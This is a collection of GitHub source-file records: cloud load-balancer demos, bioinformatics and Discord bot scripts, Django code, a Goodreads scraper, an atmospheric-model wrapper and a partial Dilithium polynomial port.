{}\".format(member.id, balancer.name))\n\n # == Test Load Balancer by connecting to it multiple times ==\n PAUSE = 60\n display(\"Sleeping for %d seconds for LB members to serve...\" % PAUSE)\n time.sleep(PAUSE)\n rounds = 200\n url = \"http://%s/\" % balancer.ip\n line_length = 75\n display(\"Connecting to {} {} times\".format(url, rounds))\n for x in range(rounds):\n response = url_req.urlopen(url)\n output = str(response.read(), encoding=\"utf-8\").strip()\n if \"www-001\" in output:\n padded_output = output.center(line_length)\n elif \"www-002\" in output:\n padded_output = output.rjust(line_length)\n else:\n padded_output = output.ljust(line_length)\n sys.stdout.write(\"\\r%s\" % padded_output)\n sys.stdout.flush()\n time.sleep(0.25)\n\n print(\"\")\n if CLEANUP:\n balancers = gcelb.list_balancers()\n healthchecks = gcelb.ex_list_healthchecks()\n nodes = gce.list_nodes(ex_zone=\"all\")\n firewalls = gce.ex_list_firewalls()\n\n display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, nodes, balancers + healthchecks + firewalls)\n\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\n# ==== BACKEND SERVICE LOAD BALANCER CODE STARTS HERE ====\ndef main_backend_service():\n start_time = datetime.datetime.now()\n display(\"Backend Service w/Global Forwarding Rule demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # Based on the instructions at:\n # https://cloud.google.com/compute/docs/load-balancing/http/#overview\n\n zone_central = DATACENTER\n zone_east = BACKUP_DATACENTER\n it_name = \"%s-instancetemplate\" % DEMO_BASE_NAME\n mig_name = \"%s-mig\" % DEMO_BASE_NAME\n hc_name = \"%s-healthcheck\" % DEMO_BASE_NAME\n bes_name = \"%s-bes\" % DEMO_BASE_NAME\n urlmap_name = \"%s-urlmap\" % DEMO_BASE_NAME\n targethttpproxy_name = \"%s-httptargetproxy\" % DEMO_BASE_NAME\n address_name = \"%s-address\" % DEMO_BASE_NAME\n gfr_name = \"%s-gfr\" % DEMO_BASE_NAME\n firewall_name = \"%s-firewall\" % DEMO_BASE_NAME\n\n startup_script = (\n \"apt-get -y update && \"\n \"apt-get -y install apache2 && \"\n 'echo \"$(hostname)\" > /var/www/html/index.html'\n )\n tag = \"%s-mig-www\" % DEMO_BASE_NAME\n metadata = {\"items\": [{\"key\": \"startup-script\", \"value\": startup_script}]}\n\n mig_central = None\n mig_east = None\n bes = None\n urlmap = None\n tp = None\n address = None\n gfr = None\n firewall = None\n\n display(\"Create a BackendService\")\n # == Create an Instance Template ==\n it = gce.ex_create_instancetemplate(\n it_name,\n size=\"n1-standard-1\",\n image=\"debian-8\",\n network=\"default\",\n metadata=metadata,\n tags=[tag],\n )\n display(' InstanceTemplate \"%s\" created' % it.name)\n\n # == Create a MIG ==\n mig_central = create_mig(gce, mig_name, zone_central, it, \"central\")\n mig_east = create_mig(gce, mig_name, zone_east, it, \"east\")\n\n # == Create a Health Check ==\n hc = gce.ex_create_healthcheck(\n hc_name,\n host=None,\n path=\"/\",\n port=\"80\",\n interval=30,\n timeout=10,\n unhealthy_threshold=10,\n healthy_threshold=1,\n )\n display(\" Healthcheck %s created\" % hc.name)\n\n # == Create a Backend Service ==\n be_central = gce.ex_create_backend(instance_group=mig_central.instance_group)\n be_east = gce.ex_create_backend(instance_group=mig_east.instance_group)\n bes = gce.ex_create_backendservice(\n bes_name,\n [hc],\n backends=[be_central, be_east],\n port_name=\"%s-http\" % DEMO_BASE_NAME,\n protocol=\"HTTP\",\n description=\"%s bes desc\" % DEMO_BASE_NAME,\n timeout_sec=60,\n enable_cdn=False,\n )\n display(' Backend Service \"%s\" created' % bes.name)\n\n # == Create a URLMap ==\n urlmap = gce.ex_create_urlmap(urlmap_name, default_service=bes)\n display(' URLMap \"%s\" created' % urlmap.name)\n\n # == Create a Target (HTTP) Proxy ==\n tp = gce.ex_create_targethttpproxy(targethttpproxy_name, urlmap)\n display(' TargetProxy \"%s\" created' % tp.name)\n\n # == Create a Static Address ==\n address = gce.ex_create_address(address_name, region=\"global\")\n display(' Address \"{}\" created with IP \"{}\"'.format(address.name, address.address))\n # == Create a Global Forwarding Rule ==\n gfr = gce.ex_create_forwarding_rule(\n gfr_name,\n target=tp,\n address=address,\n port_range=\"80\",\n description=\"%s libcloud forwarding rule http test\" % DEMO_BASE_NAME,\n global_rule=True,\n )\n display(' Global Forwarding Rule \"%s\" created' % (gfr.name))\n\n # == Create a Firewall for instances ==\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"80\"]}]\n firewall = gce.ex_create_firewall(firewall_name, allowed, target_tags=[tag])\n display(\" Firewall %s created\" % firewall.name)\n\n # TODO(supertom): launch instances to demostrate that it works\n # take backends out of service. Adding in this functionality\n # will also add 10-15 minutes to the demo.\n # display(\"Sleeping for 10 minutes, starting at %s\" %\n # str(datetime.datetime.now()))\n # time.sleep(600)\n\n if CLEANUP:\n display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n clean_up(\n gce,\n DEMO_BASE_NAME,\n None,\n resource_list=[\n firewall,\n gfr,\n address,\n tp,\n urlmap,\n bes,\n hc,\n mig_central,\n mig_east,\n it,\n ],\n )\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\n# ==== GOOGLE DNS CODE STARTS HERE ====\ndef main_dns():\n start_time = datetime.datetime.now()\n display(\"DNS demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n gdns = get_dns_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # Get list of managed zones\n zones = gdns.iterate_zones()\n display(\"Zones\", zones)\n\n # Get list of records\n zones = gdns.iterate_zones()\n for z in zones:\n records = gdns.iterate_records(z)\n display('Records for managed zone \"%s\"' % z.id, records)\n\n # TODO(erjohnso): Finish this DNS section. Challenging in that you need to\n # own a domain, so testing will require user customization. Perhaps a new\n # command-line required flag unless --skip-dns is supplied. Also, real\n # e2e testing should try to do DNS lookups on new records, but DNS TTL\n # and propagation delays will introduce limits on what can be tested.\n\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Google Cloud Platform Demo / Live Test Script\")\n parser.add_argument(\n \"--compute\",\n help=\"perform compute demo / live tests\",\n dest=\"compute\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--load-balancer\",\n help=\"perform load-balancer demo / live tests\",\n dest=\"lb\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--backend-service\",\n help=\"perform backend-service demo / live tests\",\n dest=\"bes\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--dns\", help=\"perform DNS demo / live tests\", dest=\"dns\", action=\"store_true\"\n )\n parser.add_argument(\n \"--cleanup-only\",\n help=\"perform clean-up (skips all tests)\",\n dest=\"cleanup\",\n action=\"store_true\",\n )\n cl_args = parser.parse_args()\n\n if cl_args.cleanup:\n cleanup_only()\n else:\n if cl_args.compute:\n main_compute()\n if cl_args.lb:\n main_load_balancer()\n if cl_args.dns:\n main_dns()\n if cl_args.bes:\n main_backend_service()\n","repo_name":"apache/libcloud","sub_path":"demos/gce_demo.py","file_name":"gce_demo.py","file_ext":"py","file_size_in_byte":34855,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"74590994986","text":"import itertools\n\nwith open(\"data/rosalind_perm.txt\", \"r\") as sample:\n sample_input = sample.readlines()\n #Using join to get number in list and \"int\" to turn the number into integer\n #I also had to add 1 to the number, bcause the starting point to count is 0\n sample_int = int(\"\".join(sample_input)) + 1\n sample_list = []\n\nfor i in range(1,sample_int):\n sample_list.append(i)\n\n#Getting permutations \npermutation = list(itertools.permutations(sample_list))\n\nprint(len(permutation))\nfor item in permutation:\n print(*item)\n","repo_name":"felipevzps/rosalind.info","sub_path":"Bioinformatics Stronghold/#19 Enumerating Gene Orders.py","file_name":"#19 Enumerating Gene Orders.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25615539269","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c279(commands.Cog, name=\"c279\"):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n @commands.command(name='Hex_of_Arthrophobia', aliases=['c279', 'Hex_3'])\n async def example_embed(self, ctx):\n embed = discord.Embed(title='Hex of Arthrophobia',\n color=0x1D9E74)\n embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2360772.jpg')\n\n embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3 (Hex)', inline=True)\n embed.add_field(name='Type', value='Spell/Quick-Play', inline=False)\n embed.add_field(name='Card Effect', value='Discard 1 card and target 1 face-up monster on the field; that monster\\'s original ATK becomes halved until the end of this turn. During your End Phase, if a DARK monster you control was sent to the GY the turn you activated this card: You can add 1 \"Hex\" Spell from your GY to your hand, except \"Hex of Arthrophobia\".', inline=False)\n embed.set_footer(text='Set Code: ANCF')\n\n await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(c279(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c279.py","file_name":"c279.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21215455322","text":"from ctypes import resize\nfrom unittest import TestCase\n\nfrom recipes.models import Ingredient, Recipe\nfrom recipes.templatetags.resizer import resize_to\n\n\n# def resize_to(ingredient, target):\n# servings = ingredient.recipe.servings\n# if servings is not None and target is not None:\n# try:\n# ratio = int(target) / servings\n# return ingredient.amount * ratio\n# except ValueError\n# pass\n# return ingredient.amount\n\n\nclass ResizeToTests(TestCase):\n def test_no_resize(self):\n # Arrange\n\n # Act\n\n # Assert\n with self.assertRaises(AttributeError):\n resize_to(None, 3)\n # assertRaises checks to see if error is raised\n\n def test_recipe_has_no_serving(self):\n # Arrange\n recipe = Recipe(servings=None)\n ingredient = Ingredient(recipe=recipe, amount=5)\n\n # Act\n result = resize_to(ingredient, None)\n\n # Assert\n self.assertEqual(5, result)\n # assertEqual checks to see if those values are returned\n\n def test_resize_to_is_none(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n\n # Act\n result = resize_to(ingredient, None)\n\n # Assert\n self.assertEqual(5, result)\n\n def test_values_for_servings_amount_and_target(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n \n # Act\n result = resize_to(ingredient, 10)\n \n # Assert\n self.assertEqual(25, result)\n\n def test_target_is_letters(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n # Act\n result = resize_to(ingredient, \"abc\")\n # Assert\n self.assertEqual(5, result)\n","repo_name":"j8ycey/Scrumptious","sub_path":"recipes/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44434569448","text":"\"\"\"ta dando agora\n\nRevision ID: fe375fa1c32d\nRevises: 1a3498493247\nCreate Date: 2023-11-14 21:34:26.276952\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fe375fa1c32d'\ndown_revision = '1a3498493247'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('post', schema=None) as batch_op:\n batch_op.add_column(sa.Column('title', sa.String(length=60), nullable=True))\n batch_op.alter_column('body',\n existing_type=sa.VARCHAR(length=140),\n type_=sa.String(length=300),\n existing_nullable=True)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('post', schema=None) as batch_op:\n batch_op.alter_column('body',\n existing_type=sa.String(length=300),\n type_=sa.VARCHAR(length=140),\n existing_nullable=True)\n batch_op.drop_column('title')\n\n # ### end Alembic commands ###\n","repo_name":"vgsong/vgexcel","sub_path":"migrations/versions/fe375fa1c32d_ta_dando_agora.py","file_name":"fe375fa1c32d_ta_dando_agora.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20816323781","text":"__author__ = 'Simo'\nfrom models import *\nfrom goodreads import Goodreads\nfrom cassandracustom import Cassandra\nfrom cassandra.cqlengine.management import sync_table, sync_type\nfrom cassandra.cqlengine.query import DoesNotExist, MultipleObjectsReturned\nfrom outils import space, initialize_logger\nfrom cassandra.query import SimpleStatement\nimport datetime\nfrom uuid import uuid4, UUID\nfrom types import ListType\nimport time\nimport logging\nimport os.path\nimport coloredlogs\nimport random\n\n#Get more details of the books (list of shelves, and general details)\ndef getBookDetails(c, g):\n while (True):\n rows = c.getSession().execute('SELECT id,gid FROM prs.books WHERE shelves_retrieved=false')\n skip = 0\n for row in rows:\n if (skip > 0):\n skip -= 1\n logging.warning(\"Skipping %d\", skip)\n continue\n b = c.getSession().execute('SELECT shelves_retrieved FROM prs.books WHERE id=%s', (row['id'],))\n if b[0]['shelves_retrieved'] == True:\n logging.warning(\"Shelve already retrieved for book %s %s\", row['id'], row['gid'])\n skip = int(random.random()*20)\n continue\n else:\n logging.info(\"Retrieving shelves for %s %s\", row['id'], row['gid'])\n book, similarBook = g.getBook(int(row['gid']))\n if (book is None):\n b = Books.get(gid=int(row['gid']))\n b.error_retrieving_shelves = True\n b.save()\n continue\n else:\n b = c.getSession().execute('SELECT shelves_retrieved FROM prs.books WHERE id=%s', (row['id'],))\n if (b[0]['shelves_retrieved'] == True):\n logging.warning(\"Shelve already retrieved for book %s %s\", row['id'], row['gid'])\n skip = int(random.random()*20)\n continue\n logging.info(\"books %s %s retrieved\", row['id'], row['gid'])\n c.updateSmallBook(book, row['id'])\n logging.info(\"Finish saving %s %s\", row['id'], row['gid'])\n time.sleep(5)\n\n#Sync the model to Cassandra\ndef syncTables():\n sync_table(Books)\n sync_table(Shelves)\n sync_table(Authors)\n sync_table(Users)\n sync_table(Reviews)\n\n#Init cassandra and goodreads api\ndef init():\n initialize_logger(os.getcwd())\n coloredlogs.install(level='DEBUG')\n coloredlogs.ColoredFormatter()\n c = Cassandra()\n syncTables()\n g = Goodreads()\n return (c, g)\n\n\nif __name__ == \"__main__\":\n c, g = init()\n u = c.get_user_if_exsists_or_save(Users(id=uuid.uuid4(), gid=47225465,\n name='Simone', friends_count=1,\n small_user=True))\n getBookDetails(c, g)\n","repo_name":"Simone-cogno/MT-Product-Recommender-System_improved-with-social-network-information","sub_path":"Sources/GoodreadsPythonAPI/get_bookDetails.py","file_name":"get_bookDetails.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31793753725","text":"import hashlib\nimport urllib\n\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom products.models import ProductUserAction\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef param_replace(context, **kwargs):\n d = context['request'].GET.copy()\n for k, v in kwargs.items():\n d[k] = v\n for k in [k for k, v in d.items() if not v]:\n del d[k]\n return d.urlencode()\n\n\n@register.filter\ndef as_percentage_of(part, whole):\n try:\n return \"%d%%\" % (float(part) / float(whole) * 100)\n except (ValueError, ZeroDivisionError, TypeError):\n return \"0\"\n\n\n\n@register.filter\ndef gravatar_url(email, size=20):\n default = \"https://www.minervastrategies.com/wp-content/uploads/2016/03/default-avatar.jpg\"\n return \"https://www.gravatar.com/avatar/%s?%s\" % (hashlib.md5(email.lower().encode()).hexdigest(), urllib.parse.urlencode({'d': default, 's': str(size)}))\n\n\n@register.filter\ndef gravatar(email, size=20):\n url = gravatar_url(email, size)\n return mark_safe('' % (url, size, size))\n\n\n@register.filter\ndef get_rate_user(user, product):\n rate = ProductUserAction.objects.filter(product=product, user=user).first()\n if rate:\n return rate.rate\n else:\n return 0\n\n\n@register.filter\ndef declination(val, words):\n value = abs(int(val)) % 100\n num = value % 10\n if value > 10 and value < 20:\n return f'{val} {words[2]}'\n if num > 1 and num < 5:\n\t return f'{val} {words[1]}'\n if num == 1:\n\t return f'{val} {words[0]}'\n return f'{val} {words[2]}'","repo_name":"Eternlyours/bem-store-v1","sub_path":"store/templatetags/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9249146178","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis file is part of the complex_terrain algorithm\nM. Lamare, M. Dumont, G. Picard (IGE, CEN).\n\"\"\"\nimport numpy as np\nimport Py6S as ps\n\n\nclass rtmodel(object):\n \"\"\"\n \"\"\"\n def __init__(self):\n self.outputs = None\n\n def run(self, sza, saa, vza, vaa, wvl, alt, aero,\n aod=0.1, refl=0.99, water=0.05, ozone=0.30, atmo=None, atcor=False,\n ):\n \"\"\" Run PY6S\n date = datetime object specifying the day and month of acquisition\n lat = latitude of point considered (in degrees)\n sza, saa, vza, vaa = viewing angles input in radians\n wvl = wavelength in namometers\n alt_km =\n profile has to be one of the following:\n \"\"\"\n\n # Convert nanometer input into um for the model\n wvl_um = wvl / 1000\n alt_km = alt / 1000\n\n # Build aero profiles\n aero_profiles = {\n \"Continental\": ps.AeroProfile.Continental,\n \"BiomassBurning\": ps.AeroProfile.BiomassBurning,\n \"Desert\": ps.AeroProfile.Desert,\n \"Maritime\": ps.AeroProfile.Maritime,\n \"Stratospheric\": ps.AeroProfile.Stratospheric,\n \"Urban\": ps.AeroProfile.Urban,\n \"None\": ps.AeroProfile.NoAerosols,\n }\n\n # Generate a 6S class\n s = ps.SixS()\n\n # Add geometry\n s.geometry = ps.Geometry.User()\n\n # Convert angles in radians to degrees\n s.geometry.solar_z = np.rad2deg(sza)\n s.geometry.view_z = np.rad2deg(vza)\n s.geometry.solar_a = np.rad2deg(saa)\n s.geometry.view_a = np.rad2deg(vaa)\n\n # s.geometry.day = date.day\n # s.geometry.month = date.month\n\n # Set altitudes\n s.altitudes = ps.Altitudes()\n s.altitudes.set_target_custom_altitude(alt_km)\n s.altitudes.set_sensor_satellite_level()\n\n s.wavelength = ps.Wavelength(wvl_um) # Set wavelength in um\n\n # Atmosphere parameters\n if atmo is None:\n\n # If no standard atmospheric profile is specified, use water and\n # ozone.\n s.atmos_profile = ps.AtmosProfile.UserWaterAndOzone(water, ozone)\n else:\n\n # Build atmo dictionnary\n atmo_profiles = {\n \"Mid_lat_summer\": ps.AtmosProfile.MidlatitudeSummer,\n \"Mid_lat_winter\": ps.AtmosProfile.MidlatitudeWinter,\n \"Sub_arctic_summer\": ps.AtmosProfile.SubarcticSummer,\n \"Sub_arctic_winter\": ps.AtmosProfile.SubarcticWinter,\n \"Tropical\": ps.AtmosProfile.Tropical,\n \"None\": ps.AtmosProfile.NoGaseousAbsorption,\n }\n # Run a standard atmospheric profile\n s.atmos_profile = ps.AtmosProfile.PredefinedType(\n atmo_profiles[atmo])\n\n # Aerosol parameters\n s.aero_profile = ps.AeroProfile.PredefinedType(aero_profiles[aero])\n\n s.aot550 = aod\n\n # According to switch, perform atmospheric correction or not\n if atcor:\n s.atmos_corr = ps.AtmosCorr.AtmosCorrLambertianFromReflectance(\n refl)\n else:\n s.ground_reflectance = ps.GroundReflectance.HomogeneousLambertian(\n refl\n )\n\n s.run() # Run Py6S\n\n self.outputs = s.outputs\n","repo_name":"maximlamare/REDRESS","sub_path":"redress/rtmodel/python_6S.py","file_name":"python_6S.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"40636647221","text":"import subprocess\nimport sys\n\ndef GetEnv(arch):\n \"\"\"Gets the saved environment from a file for a given architecture.\"\"\"\n # The environment is saved as an \"environment block\" (see CreateProcess\n # and msvs_emulation for details). We convert to a dict here.\n # Drop last 2 NULs, one for list terminator, one for trailing vs. separator.\n pairs = open(arch).read()[:-2].split('\\0')\n kvs = [item.split('=', 1) for item in pairs]\n return dict(kvs)\n\ndef main(arch, *args):\n \"\"\"Filter logo banner from invocations of asm.exe.\"\"\"\n env = GetEnv(arch)\n popen = subprocess.Popen(args, shell=True, env=env, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n out, _ = popen.communicate()\n for line in out.splitlines():\n if (not line.startswith('Copyright (C) Microsoft Corporation') and\n not line.startswith('Microsoft (R) Macro Assembler') and\n not line.startswith(' Assembling: ') and\n line):\n print(line)\n return popen.returncode\n\nif __name__ == '__main__':\n sys.exit(main(*sys.argv[1:]))\n","repo_name":"ndsol/volcano","sub_path":"src/gn/toolchain/win/asm_wrapper.py","file_name":"asm_wrapper.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"9999451740","text":"from django.urls import path\nfrom apps.github_task import views\n\n\nurlpatterns = [\n path('edit/', views.edittask, name='edit'),\n path('', views.task, name='task'),\n path('all/', views.all_task, name='alltask'),\n path('delitem/', views.delitem, name='delitem')\n]","repo_name":"MisakiKata/github_monitor","sub_path":"apps/github_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1397490948","text":"from Products.ATContentTypes.lib import constraintypes\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom bika.lims.browser import BrowserView\nfrom plone import api\nfrom plone.app.layout.viewlets import ViewletBase\nfrom baobab.lims.browser.project import *\nfrom baobab.lims.browser.project.util import SampleGeneration\nfrom baobab.lims.interfaces import IUnmanagedStorage, IStoragePosition, IManagedStorage\nfrom baobab.lims.permissions import ManageKits\nfrom Products.CMFCore.utils import getToolByName\n\nfrom bika.lims.utils import tmpID\nfrom bika.lims.utils import to_utf8\nfrom bika.lims.utils import encode_header\nfrom bika.lims.utils import createPdf\nfrom bika.lims.utils import attachPdf\nfrom bika.lims.utils.sample import create_sample\nfrom bika.lims.utils.samplepartition import create_samplepartition\nimport datetime\n\n\nclass DownloadVGAReport(BrowserView):\n\n template = ViewPageTemplateFile(\"templates/download_viral_genomic_analysis_report.pt\")\n\n def __init__(self, context, request):\n super(DownloadVGAReport, self).__init__(context, request)\n self.context = context\n self.request = request\n self.pc = getToolByName(self.context, 'portal_catalog')\n\n def __call__(self):\n self.prepare_overhead_data()\n self.prepare_report()\n self.now = datetime.datetime.now()\n pdf_data = createPdf(htmlreport=self.template())\n\n date = datetime.datetime.now().strftime(\"%Y%m%d%H%M\")\n setheader = self.request.RESPONSE.setHeader\n setheader(\"Content-type\", \"application/pdf\")\n setheader(\"Content-Disposition\",\n \"attachment;filename=\\\"viral_genomic_analysis_%s.pdf\\\"\" % date)\n\n self.request.RESPONSE.write(pdf_data)\n\n def prepare_report(self):\n self.title = self.context.Title()\n self.date_created = self.context.getDateCreated()\n self.project = self.context.getProject().Title()\n self.prepared_viral_loads = self.context.prepare_viral_load_data()\n\n def prepare_overhead_data(self):\n\n pc = self.portal_catalog\n self.checkPermission = self.context.portal_membership.checkPermission\n self.SamplingWorkflowEnabled = self.context.bika_setup.getSamplingWorkflowEnabled()\n\n # Client details (if client is associated)\n project = self.context.getProject()\n client = project.getClient()\n\n if client:\n self.client = client\n client_address = self.client.getPostalAddress()\n if not client_address:\n client_address = self.contact.getBillingAddress()\n if not client_address:\n client_address = self.contact.getPhysicalAddress()\n if client_address:\n _keys = ['address', 'city', 'state', 'zip', 'country']\n _list = [client_address.get(v) for v in _keys if client_address.get(v)]\n self.client_address = \"
    \".join(_list).replace(\"\\n\", \"
    \")\n if self.client_address.endswith(\"
    \"):\n self.client_address = self.client_address[:-5]\n else:\n self.client_address = None\n\n # Reporter\n self.member = self.context.portal_membership.getAuthenticatedMember()\n self.username = self.member.getUserName()\n self.reporter = self.user_fullname(self.username)\n self.reporter_email = self.user_email(self.username)\n self.reporter_signature = \"\"\n c = [x for x in self.bika_setup_catalog(portal_type='LabContact')\n if x.getObject().getUsername() == self.username]\n if c:\n sf = c[0].getObject().getSignature()\n if sf:\n self.reporter_signature = sf.absolute_url() + \"/Signature\"\n\n # laboratory\n self.laboratory = self.context.bika_setup.laboratory\n self.accredited = self.laboratory.getLaboratoryAccredited()\n lab_address = self.laboratory.getPrintAddress()\n\n if lab_address:\n self.lab_address = lab_address\n else:\n self.lab_address = None\n\n\n\n\n\n\n\n\n\n","repo_name":"BaobabLims/baobab.lims","sub_path":"baobab/lims/browser/viral_genomic_analysis/download_report.py","file_name":"download_report.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"72062685868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 14 21:05:42 2020\r\n\r\n@author: Ria\r\n\"\"\"\r\n\r\nDILITHIUM_MODE = 2\r\nfrom params import *\r\nimport array\r\nimport numpy as np\r\nfrom fips202 import *\r\nfrom reduce import * \r\nclass poly:\r\n def __init__(self,coeffs):\r\n self.coeffs = []# Poly Lib Implement vector poly vec[L]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_reduce\r\n*\r\n* Description: Inplace reduction of all coefficients of polynomial to\r\n* representative in [-6283009,6283007].\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_reduce(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] = reduce32(poly_a.coeffs[i])\r\n\r\n\r\n\"\"\" \r\n/*************************************************\r\n* Name: poly_caddq\r\n*\r\n* Description: For all coefficients of in/out polynomial add Q if\r\n* coefficient is negative.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_cadq(poly_a):\r\n for i in range(N):\r\n poly_a.poly.coeffs[i] = caddq(poly_a.poly.coeffs[i])\r\n \r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_freeze\r\n*\r\n* Description: Inplace reduction of all coefficients of polynomial to\r\n* standard representatives.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/ \"\"\"\r\n\r\n\r\ndef poly_freeze(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] = freeze(poly_a.coeffs[i])\r\n \r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_add\r\n*\r\n* Description: Add polynomials. No modular reduction is performed.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first summand\r\n* - const poly *b: pointer to second summand\r\n**************************************************/\"\"\"\r\n\r\ndef poly_add(poly_c, poly_a, poly_b):\r\n for i in range(N):\r\n poly_c.coeffs[i] = poly_a.coeffs[i] + poly_b.coeffs[i]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_sub\r\n*\r\n* Description: Subtract polynomials. No modular reduction is\r\n* performed.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first input polynomial\r\n* - const poly *b: pointer to second input polynomial to be\r\n* subtraced from first i\"\"\" \r\n\r\ndef poly_sub(poly_c, poly_a, poly_b):\r\n for i in range(N):\r\n poly_c.coeffs[i] = poly_a.coeffs[i] - poly_b.coeffs[i]\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_shiftl\r\n*\r\n* Description: Multiply polynomial by 2^D without modular reduction. Assumes\r\n* input coefficients to be less than 2^{31-D} in absolute value.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_shiftl(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] <<=D\r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_ntt\r\n*\r\n* Description: Inplace forward NTT. Coefficients can grow by\r\n* 8*Q in absolute value.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_ntt(poly_a):\r\n ntt(poly_a.coeffs)\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_invntt_tomont\r\n*\r\n* Description: Inplace inverse NTT and multiplication by 2^{32}.\r\n* Input coefficients need to be less than Q in absolute\r\n* value and output coefficients are again bounded by Q.\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_invntt_tomont(poly_a):\r\n invntt_tomont(poly_acoeffs)\r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_pointwise_montgomery\r\n*\r\n* Description: Pointwise multiplication of polynomials in NTT domain\r\n* representation and multiplication of resulting polynomial\r\n* by 2^{-32}.\r\n*\r\n* Arguments: - poly *c: pointer to output polynomial\r\n* - const poly *a: pointer to first input polynomial\r\n* - const poly *b: pointer to second input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_pointwise_montgomery(poly_c, poly_a, poly_b):\r\n for i in range (N):\r\n poly_c.coeffs[i] = montgomery_reduce(poly_a.coeffs[i]*poly_b.coeffs[i])\r\n \r\n \r\n\"\"\"/*************************************************\r\n* Name: poly_power2round\r\n*\r\n* Description: For all coefficients c of the input 